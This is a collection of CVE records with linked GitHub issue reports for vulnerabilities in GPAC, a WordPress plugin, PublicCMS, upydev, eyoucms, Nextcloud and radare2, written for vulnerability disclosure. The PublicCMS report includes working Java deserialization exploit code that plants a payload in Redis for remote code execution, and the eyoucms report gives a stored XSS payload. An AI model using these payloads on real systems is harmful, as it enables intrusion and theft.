[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2680" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2680" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/2680
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
1.Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io/ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D 2.ASAN [M3U8] Unsupported directive #EXT-X-VERSION: [M3U8] Attribute SEQUENCE:1 not supported [M3U8] Invalid #EXT-X-MEDIA: TYPE is missing. Ignoring the line. [M3U8] Invalid URI (URI=") in EXT-X-MAP [M3U8] Failed to parse root playlist './crashes/crash4', error = BitStream Not Compliant [DASH] Error - cannot connect service: MPD creation problem BitStream Not Compliant [DASHDmx] Error - cannot initialize DASH Client for ./crashes/crash4: BitStream Not Compliant Failed to connect filter fin PID crash4 to filter dashin: BitStream Not Compliant Blacklisting dashin as output from fin and retrying connections Failed to find any filter for URL ./crashes/crash4, disabling destination filter fout Filter fin failed to setup: Filter not found for the desired type Filters not connected: fout (dst=crash4_dash.mpd:gpac:segdur=500000/1000:profile=full:!sap:buf=1500:!check_dur:pssh=v:subs_sidx=0) (idx=1) Arg segdur set but not used Arg profile set but not used Arg !sap set but not used Arg buf set but not used Arg !check_dur set but not used Arg pssh set but not used Arg subs_sidx set but not used Error DASHing file: Filter not found for the desired type ================================================================= ==150880==ERROR: LeakSanitizer: detected memory leaks Direct leak of 120 byte(s) in 1 object(s) allocated from: #0 0x7f7fcaf3ca57 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154 #1 0x7f7fc9d73286 in extract_attributes media_tools/m3u8.c:329 Indirect leak of 11 byte(s) in 1 object(s) allocated from: #0 0x7f7fcaf3ca57 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154 #1 0x7f7fc9d7385b in extract_attributes media_tools/m3u8.c:345 SUMMARY: AddressSanitizer: 131 byte(s) leaked in 2 allocation(s).. 3.Reproduction ./MP4Box -dash 500000 $poc 4.POC file [crash.00.zip](https://github.com/gpac/gpac/files/13276778/crash.00.zip) 5.Impact Memory leaks can cause program performance degradation, system crashes, or unpredictable behavior 6. Credit jarront
memory leaks in extract_attributes media_tools/m3u8.c:329
https://api.github.com/repos/gpac/gpac/issues/2680/comments
0
2023-11-07T07:24:45Z
2023-12-04T10:07:50Z
https://github.com/gpac/gpac/issues/2680
1,980,712,658
2,680
5,760
CVE-2023-48300
2023-11-20T19:15:09.063
The `Embed Privacy` plugin for WordPress that prevents the loading of embedded external content is vulnerable to Stored Cross-Site Scripting via `embed_privacy_opt_out` shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Version 1.8.1 contains a patch for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit" ], "url": "https://d.pr/v/ORuIat" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/epiphyt/embed-privacy/commit/f80929992b2a5a66f4f4953cd6f46cc227154a5c" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/epiphyt/embed-privacy/issues/199" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/epiphyt/embed-privacy/security/advisories/GHSA-3wv9-4rvf-w37g" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://d.pr/v/ORuIat" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/epiphyt/embed-privacy/commit/f80929992b2a5a66f4f4953cd6f46cc227154a5c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/epiphyt/embed-privacy/issues/199" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/epiphyt/embed-privacy/security/advisories/GHSA-3wv9-4rvf-w37g" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:epiph:embed_privacy:*:*:*:*:*:wordpress:*:*", "matchCriteriaId": "A1422C6B-88AD-4A05-B4BA-3B2BDC88842B", "versionEndExcluding": "1.8.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/epiphyt/embed-privacy/issues/199
[ "Issue Tracking" ]
github.com
[ "epiphyt", "embed-privacy" ]
### Bug/Problem The `show_all` property in the opt-out shortcode may execute unwanted code. ### Steps to reproduce … ### Version 1.8.0 ### Link _No response_ ### Environment info _No response_ ### Code of Conduct - [X] I agree to follow this project's Code of Conduct
Fix sanitizing in show_all shortcode attribute
https://api.github.com/repos/epiphyt/embed-privacy/issues/199/comments
0
2023-11-01T15:43:56Z
2023-11-01T15:50:16Z
https://github.com/epiphyt/embed-privacy/issues/199
1,972,624,548
199
5,761
CVE-2023-46990
2023-11-20T20:15:07.407
Deserialization of Untrusted Data in PublicCMS v.4.0.202302.e allows a remote attacker to execute arbitrary code via a crafted script to the writeReplace function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/sanluan/PublicCMS/issues/76#issue-1960443408" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/sanluan/PublicCMS/issues/76#issue-1960443408" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:4.0.202302.e:*:*:*:*:*:*:*", "matchCriteriaId": "696F37D9-7CB7-428B-ADE4-3EB40573111A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/sanluan/PublicCMS/issues/76#issue-1960443408
[ "Exploit" ]
github.com
[ "sanluan", "PublicCMS" ]
Hello,I found a Deserialization vulnerability in the lastest version of PublicCMS- V4.0.202302.e The prerequisite for this vulnerability is that the website uses redis cache and needs to obtain redis control permission to initiate deserialization, because redis will trigger deserialization when obtaining the value through the get function. ![](http://39.107.239.30:3000/uploads/a15fb0a8-96eb-4ed8-beb2-c2b37e9dee04.png) Then there is the deserialization gadget chain. Jackson and spring exist in the website dependencies. After testing, you can use the following deserialization chain. BadAttributeValueExpException->POJOnode->TemplatesImpl。 The core code is as follows ```java public static void main( String[] args ) throws Exception { ClassPool pool = ClassPool.getDefault(); CtClass ctClass = pool.makeClass("a"); CtClass superClass = pool.get(AbstractTranslet.class.getName()); ctClass.setSuperclass(superClass); CtConstructor constructor = new CtConstructor(new CtClass[]{},ctClass); constructor.setBody("open -a /System/Applications/Calculator.app"); ctClass.addConstructor(constructor); byte[] bytes = ctClass.toBytecode(); TemplatesImpl templatesImpl = new TemplatesImpl(); setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes}); setFieldValue(templatesImpl, "_name", "boogipop"); setFieldValue(templatesImpl, "_tfactory", null); POJOnode1 jsonNodes = new POJOnode1(templatesImpl); BadAttributeValueExpException exp = new BadAttributeValueExpException(null); Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val"); val.setAccessible(true); val.set(exp,jsonNodes); ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr); objectOutputStream.writeObject(exp); FileOutputStream fout=new FileOutputStream("1.ser"); fout.write(barr.toByteArray()); fout.close(); FileInputStream fileInputStream = new FileInputStream("1.ser"); System.out.println(serial(exp)); deserialize(serial(exp)); } public static byte[] serial(Object o) throws IOException, NoSuchFieldException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(o); oos.close(); String base64String = Base64.getEncoder().encodeToString(baos.toByteArray()); System.out.println(bytesToHex(baos.toByteArray())); // 设置Redis数据库连接参数 String host = "localhost"; int port = 6379; String password = "root"; Jedis jedis = new Jedis(host, port); jedis.auth(password); jedis.set("test".getBytes(), baos.toByteArray()); return baos.toByteArray(); } ``` But you need to pay attention to one detail. You need to rewrite a writeReplace method, because this function will replace some data during the serialization process, causing deserialization errors. ![](http://39.107.239.30:3000/uploads/9f4ed1fc-3ab4-4f0f-8455-67279800e915.png) ![image](https://github.com/sanluan/PublicCMS/assets/74962842/ce35e7cf-82ef-4183-ad24-4b9c0c37fe53) Reconstruct the BaseJsonNode.writeReplace function in the jar package, making sure to keep the path consistent. ![image](https://github.com/sanluan/PublicCMS/assets/74962842/55a255fd-e8f4-4ea0-a65b-00b4199aae49) If you only need to try rce locally, you can write it more conveniently like this.Rewrite it with the following code ```java import com.fasterxml.jackson.databind.node.POJONode; import java.util.GregorianCalendar; public class POJOnode1 extends POJONode { public POJOnode1(Object v) { super(v); } Object writeReplace() { GregorianCalendar NodeSerialization; return this; } } ``` so now, you can use the above code to write the serialized hex data to redis。 ![](http://39.107.239.30:3000/uploads/c53e110e-2ee7-40a1-ab46-492250afbf2d.png) When you use redis cache, the database will become like this ![](http://39.107.239.30:3000/uploads/d19b03ba-8305-4795-86cf-ea06533c2525.png) So if you can control the redis database at this time, you only need to change one of the domain.localhost or some other impairment to trigger deserialization to reach rce。Like the following main ![](http://39.107.239.30:3000/uploads/ab614cce-c9e4-4526-bf3a-ee59c40e88d5.png) Just visit the website now。 ![](http://39.107.239.30:3000/uploads/85b6a2ca-bdd1-4217-8244-9380fa9be519.png)
Trigger deserialization rce through redis cache
https://api.github.com/repos/sanluan/PublicCMS/issues/76/comments
1
2023-10-25T03:09:30Z
2024-12-26T06:39:55Z
https://github.com/sanluan/PublicCMS/issues/76
1,960,443,408
76
5,762
CVE-2023-48051
2023-11-20T23:15:06.550
An issue in /upydev/keygen.py in upydev v0.4.3 allows attackers to decrypt sensitive information via weak encryption padding.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation" ], "url": "https://github.com/Carglglz/upydev/issues/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation" ], "url": "https://github.com/Carglglz/upydev/issues/38" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:carglglz:upydev:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "A264C36A-D2B3-4E62-BB7C-6B2E5C0054C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "326" ]
326
https://github.com/Carglglz/upydev/issues/38
[ "Exploit", "Issue Tracking", "Mitigation" ]
github.com
[ "Carglglz", "upydev" ]
### Description: In the upydev repository, specifically within the keygen.py script, the RSA algorithm is implemented with PKCS 1v1.5 padding, which is known to be insecure and vulnerable to Bleichenbacher](https://link.springer.com/content/pdf/10.1007/bfb0055716.pdf) attack which is a chosen-ciphertext attack that exploits vulnerabilities within the RSA PKCS1v1.5 padding scheme. The use of this padding scheme can lead to security issues where an attacker may exploit the vulnerability to decipher encrypted messages or forge signatures. ### Affect Version upydev 0.4.3 ### Location: https://github.com/Carglglz/upydev/blob/master/upydev/keygen.py#L919 https://github.com/Carglglz/upydev/blob/master/upydev/keygen.py#L1176 https://github.com/Carglglz/upydev/blob/master/upydev/keygen.py#L1253 https://github.com/Carglglz/upydev/blob/master/upydev/keygen.py#L1311 https://github.com/Carglglz/upydev/blob/master/upydev/keygen.py#L1125 Expected Behavior: The cryptographic module should utilize a secure padding scheme for RSA such as OAEP (Optimal Asymmetric Encryption Padding) which is currently recommended as a safer alternative to PKCS 1v1.5. Actual Behavior: The current implementation of the RSA encryption and signature verification in keygen.py uses PKCS 1v1.5 padding, which is outdated and has known vulnerabilities that compromise the security of cryptographic operations. ### Reference: CWE-780: Use of RSA Algorithm without OAEP ### Recommendations: It is recommended to use OAEP (Optimal Asymmetric Encryption Padding) as the encryption scheme and PSS (Probabilistic Signature Scheme) as the signature scheme, as they offer better security. 1. Refactor the RSA implementation to use OAEP padding for encryption and PSS padding for signature, which are both provided by the RSA module in standard libraries like `PyCryptodome` and `cryptography.io`. 2 . Conduct a thorough audit of the cryptographic operations throughout the application to ensure that secure practices are being followed. It's crucial for the security of upydev users that this issue is addressed promptly, as cryptographic weaknesses can have severe implications for the privacy and integrity of communications facilitated by this tool. ```python message = b"encrypted data" ciphertext = public_key.encrypt( message, padding.OAEP( mgf=padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(), label=None ) ) ``` > https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/#encryption Please let me know if you require any further information or assistance in addressing this issue.
Cryptographic API Misuse Vulnerability: Do not use insecure algorithm(textbook or padding PKCS 1v1.5) for RSA
https://api.github.com/repos/Carglglz/upydev/issues/38/comments
0
2023-11-07T10:12:14Z
2023-11-07T10:12:14Z
https://github.com/Carglglz/upydev/issues/38
1,981,001,689
38
5,763
CVE-2023-46935
2023-11-21T07:15:09.967
eyoucms v1.6.4 is vulnerable Cross Site Scripting (XSS), which can lead to stealing sensitive information of logged-in users.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/55" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/55
[ "Exploit" ]
github.com
[ "weng-xianhu", "eyoucms" ]
Software Link : https://github.com/weng-xianhu/eyoucms Website : http://www.eyoucms.com/ Vulnerable version 1.6.4 download address :https://qiniu.eyoucms.com/source/EyouCMS-V1.6.4-UTF8-SP1_1015.zip After the installation is complete, log in as admin, open the page [![piEvffK.png](https://z1.ax1x.com/2023/10/25/piEvffK.png)](https://imgse.com/i/piEvffK) [![piEvoOH.png](https://z1.ax1x.com/2023/10/25/piEvoOH.png)](https://imgse.com/i/piEvoOH) Here you can fill in malicious JavaScript code to cause stored xss [![piEvXff.png](https://z1.ax1x.com/2023/10/25/piEvXff.png)](https://imgse.com/i/piEvXff) Enter the code and it will be automatically saved successfully [![piEx3h6.png](https://z1.ax1x.com/2023/10/25/piEx3h6.png)](https://imgse.com/i/piEx3h6) Refresh the page Malicious code is inserted into the webpage [![piEx6gS.png](https://z1.ax1x.com/2023/10/25/piEx6gS.png)](https://imgse.com/i/piEx6gS) Causes stored XSS to steal sensitive information of logged-in users [![piExdHA.png](https://z1.ax1x.com/2023/10/25/piExdHA.png)](https://imgse.com/i/piExdHA) POC : ```Plaintext "><img src=1 onerror=alert(/xss/)>< ```
There is stored XSS in version 1.6.4 which can lead to stealing sensitive information of logged-in users
https://api.github.com/repos/weng-xianhu/eyoucms/issues/55/comments
1
2023-10-25T08:40:36Z
2024-03-22T02:09:22Z
https://github.com/weng-xianhu/eyoucms/issues/55
1,960,863,122
55
5,764
CVE-2023-48305
2023-11-21T23:15:07.373
Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. Starting in version 25.0.0 and prior to versions 25.0.11, 26.0.6, and 27.1.0 of Nextcloud Server and Nextcloud Enterprise Server, when the log level was set to debug, the user_ldap app logged user passwords in plaintext into the log file. If the log file was then leaked or shared in any way the users' passwords would be leaked. Nextcloud Server and Nextcloud Enterprise Server versions 25.0.11, 26.0.6, and 27.1.0 contain a patch for this issue. As a workaround, change config setting `loglevel` to `1` or higher (should always be higher than 1 in production environments).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.1, "impactScore": 2.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-35p6-4992-w5fr" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/nextcloud/server/issues/38461" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/nextcloud/server/pull/40013" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://hackerone.com/reports/2101165" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-35p6-4992-w5fr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/nextcloud/server/issues/38461" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/nextcloud/server/pull/40013" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://hackerone.com/reports/2101165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "matchCriteriaId": "CFCB9CDB-F661-496E-86B7-25B228A3C90E", "versionEndExcluding": "25.0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "25.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "37949CD5-0B2D-40BE-83C8-E6A03CD0F7C9", "versionEndExcluding": "25.0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "25.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "matchCriteriaId": "9E2008E1-AFAE-40F5-8D64-A019F2222AA2", "versionEndExcluding": "26.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "26.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "4C98058B-06EF-446E-A39D-F436627469C1", "versionEndExcluding": "26.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "26.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "matchCriteriaId": "B8F5C07F-E133-4C54-B9A7-95A38086B28A", "versionEndExcluding": "27.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "27.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "E29703CE-0A92-47F3-96AE-0AC27641ECDF", "versionEndExcluding": "27.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "27.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "312" ]
312
https://github.com/nextcloud/server/issues/38461
[ "Exploit", "Issue Tracking" ]
github.com
[ "nextcloud", "server" ]
### ⚠️ This issue respects the following points: ⚠️ - [X] This is a **bug**, not a question or a configuration/webserver/proxy issue. - [X] This issue is **not** already reported on Github _(I've searched it)_. - [X] Nextcloud Server **is** up to date. See [Maintenance and Release Schedule](https://github.com/nextcloud/server/wiki/Maintenance-and-Release-Schedule) for supported versions. - [X] Nextcloud Server **is** running on 64bit capable CPU, PHP and OS. - [X] I agree to follow Nextcloud's [Code of Conduct](https://nextcloud.com/contribute/code-of-conduct/). ### Bug description The user_ldap app seems to log all LDAP operations, including parameters, in plain text. https://github.com/nextcloud/server/blob/b6d734375478c791a146e2ec5ad61ac1a699e436/apps/user_ldap/lib/LDAP.php#L320-L324 For the `ldap_bind` command this looks like ``` Calling LDAP function ldap_bind with parameters [{},"<full user DN>", "<plain text password"] ``` ### Steps to reproduce 1. configure Nextcloud for LDAP user backend 2. connect external client (in my case Gnome online account) 3. trigger ldap_bind (e.g. by syncing the calendar in the client) 4. follow the `DEBUG` log ### Expected behavior If logged, I would expect the line to not display the password, or to omit parameters completely: ``` Calling LDAP function ldap_bind with parameters [{},"<full user DN>", "********"] ``` or ``` Calling LDAP function ldap_bind ``` ### Installation method None ### Nextcloud Server version 26 ### Operating system Debian/Ubuntu ### PHP engine version PHP 8.1 ### Web server Apache (supported) ### Database engine version MariaDB ### Is this bug present after an update or on a fresh install? None ### Are you using the Nextcloud Server Encryption module? None ### What user-backends are you using? - [ ] Default user-backend _(database)_ - [X] LDAP/ Active Directory - [ ] SSO - SAML - [ ] Other ### Configuration report _No response_ ### List of activated Apps ```shell Enabled: - activity: 2.18.0 - bruteforcesettings: 2.6.0 - calendar: 4.3.4 - circles: 26.0.0 - cloud_federation_api: 1.9.0 - comments: 1.16.0 - contacts: 5.2.0 - contactsinteraction: 1.7.0 - dashboard: 7.6.0 - dav: 1.25.0 - federatedfilesharing: 1.16.0 - federation: 1.16.0 - files: 1.21.1 - files_markdown: 2.4.0 - files_pdfviewer: 2.7.0 - files_rightclick: 1.5.0 - files_sharing: 1.18.0 - files_trashbin: 1.16.0 - files_versions: 1.19.1 - firstrunwizard: 2.15.0 - jitsi: 0.17.0 - logreader: 2.11.0 - lookup_server_connector: 1.14.0 - nextcloud_announcements: 1.15.0 - notes: 4.7.2 - notifications: 2.14.0 - oauth2: 1.14.0 - onlyoffice: 7.8.0 - password_policy: 1.16.0 - photos: 2.2.0 - privacy: 1.10.0 - provisioning_api: 1.16.0 - recommendations: 1.5.0 - related_resources: 1.1.0-alpha1 - serverinfo: 1.16.0 - settings: 1.8.0 - sharebymail: 1.16.0 - support: 1.9.0 - systemtags: 1.16.0 - tasks: 0.15.0 - text: 3.7.2 - theming: 2.1.1 - twofactor_backupcodes: 1.15.0 - updatenotification: 1.16.0 - user_ldap: 1.16.0 - user_status: 1.6.0 - viewer: 1.10.0 - weather_status: 1.6.0 - workflowengine: 2.8.0 Disabled: - admin_audit: 1.16.0 - deck: 1.8.3 (installed 1.8.3) - documentserver_community: 0.1.13 (installed 0.1.13) - encryption: 2.14.0 - files_external: 1.18.0 (installed 1.7.0) - survey_client: 1.14.0 (installed 1.4.0) - suspicious_login: 4.4.0 - twofactor_totp: 8.0.0-alpha.0 ``` ### Nextcloud Signing status _No response_ ### Nextcloud Logs _No response_ ### Additional info _No response_
[Bug]: user_ldap logs user passwords in plain text
https://api.github.com/repos/nextcloud/server/issues/38461/comments
7
2023-05-25T12:57:10Z
2023-08-24T09:42:53Z
https://github.com/nextcloud/server/issues/38461
1,725,776,026
38,461
5,765
CVE-2023-47016
2023-11-22T07:15:07.530
radare2 5.8.9 has an out-of-bounds read in r_bin_object_set_items in libr/bin/bobj.c, causing a crash in r_read_le32 in libr/include/r_endian.h.
